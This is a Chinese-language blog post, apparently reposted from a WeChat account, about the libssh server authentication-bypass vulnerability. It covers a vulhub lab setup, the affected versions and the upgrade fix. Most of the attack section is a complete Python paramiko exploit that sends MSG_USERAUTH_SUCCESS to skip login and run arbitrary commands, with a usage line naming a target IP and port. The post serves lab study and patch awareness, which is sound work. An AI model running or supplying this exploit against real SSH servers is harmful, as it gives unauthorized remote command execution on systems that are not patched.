libssh 服务端权限认证绕过漏洞

libssh是一个提供ssh相关接口的开源库,包含服务端、客户端等。其服务端代码中存在一处逻辑错误,攻击者可以在认证成功前发送MSG_USERAUTH_SUCCESS消息,绕过认证过程,未授权访问目标SSH服务器。

在vulhub上开启环境,端口是2222,我们可以使用账号密码:myuser:mypassword),连接,这是一个合法的ssh流程。

启动环境:

docker-compose up -d

漏洞poc参考seebug上给出的poc,

链接是:https://www.seebug.org/vuldb/ssvid-97614

修改之后,可以直接执行任意命令。exp利用方式如下:

利用命令: python3 libsshexp.py 172.16.1.33 2222 "whoami"

攻击者成功利用此漏洞,可登入目标服务器进一步进行任意恶意操作。

另外值得说明的是,OpenSSH 与 libssh 是两个独立的项目,并且 OpenSSH 官方安全团队目前也尚未发布任何与此漏洞相关的信息,故 OpenSSH 应该不受此漏洞影响。

影响范围

libssh 0.8.x - 0.8.3

libssh 0.7.x - 0.7.5

libssh 0.6.x

解决方案

libssh 0.8.x 版本请升级到 0.8.4

libssh 0.7.x 版本请升级到 0.7.6

附上漏洞利用代码:

#!/usr/bin/env python3

import sys

import paramiko

import socket

import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)

bufsize = 2048

def execute(hostname, port, command):

sock = socket.socket()

try:

sock.connect((hostname, int(port)))

message = paramiko.message.Message()

transport = paramiko.transport.Transport(sock)

transport.start_client()

message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)

transport._send_message(message)

client = transport.open_session(timeout=10)

client.exec_command(command)

# stdin = client.makefile("wb", bufsize)

stdout = client.makefile("rb", bufsize)

stderr = client.makefile_stderr("rb", bufsize)

output = stdout.read()

error = stderr.read()

stdout.close()

stderr.close()

return (output+error).decode()

except paramiko.SSHException as e:

logging.exception(e)

logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")

except socket.error:

logging.debug("Unable to connect.")

return None

if __name__ == '__main__':

print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

本文分享自微信公众号 - 安全漏洞环境学习(gh_ddd854e535b8)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-01-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Vincent-yuan

使用winform程序控制window服务的操作 c#之添加window服务(定时任务)

这篇文章主要讲述,使用winform程序来控制window服务的安装,启动,停止,卸载等操作

18710
来自专栏授客的专栏

Python 基于Python结合pykafka实现kafka生产及消费速率&主题分区偏移实时监控

http://zookeeper.apache.org/releases.html#download

17620
来自专栏授客的专栏

Grafana 利用Grafana Variables变量配置快速切换不同主机的图表数据展示

https://pan.baidu.com/s/1jAbY4xz5gvzoXxLHesQ-PA

39210
来自专栏Java工程师成长之路

微信小程序支付接入实战

  最近接到一个小程序微信支付的需求,需要我写后台支持,本着能不自己写就不自己写的cv原则,在网上找到了些第三方程序,经过尝试后,最后决定了这不要脸作者的这款

16110
来自专栏授客的专栏

性能测试 基于Python结合InfluxDB及Grafana图表实时监控Android系统和应用进程

https://pan.baidu.com/s/1jAbY4xz5gvzoXxLHesQ-PA

12820
来自专栏Vincent-yuan

asp.net core 系列之webapi集成EFCore的简单操作教程

因为官网asp.net core webapi教程部分,给出的是使用内存中的数据即 UseInMemoryDatabase 的方式,

14020
来自专栏授客的专栏

性能测试 基于Python结合InfluxDB及Grafana图表实时采集Linux多主机性能数据

无需在被监控主机上安装代理,一键对Linux远程服务器不同主机执行性能监控、性能数据采集命令,并实时展示

10130
来自专栏Vincent-yuan

Identity和IdentityServer的区别及联系

关于Identity和IdentityServer初学的时候可能会有一些疑惑(虽然我也不是很精深吧),但是,这里说一下自己关于这两者的一些理解,如有错误,欢迎指...

9120
来自专栏Vincent-yuan

asp.net core 系列之允许跨域访问(Enable Cross-Origin Requests:CORS)

浏览器安全不允许不同域名的网页之间发送请求。这种限制叫做同源策略(the same-origin policy)。

10510
来自专栏授客的专栏

Python 使用python-kafka类库开发kafka生产者&消费者&客户端

http://zookeeper.apache.org/releases.html#download

43830

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励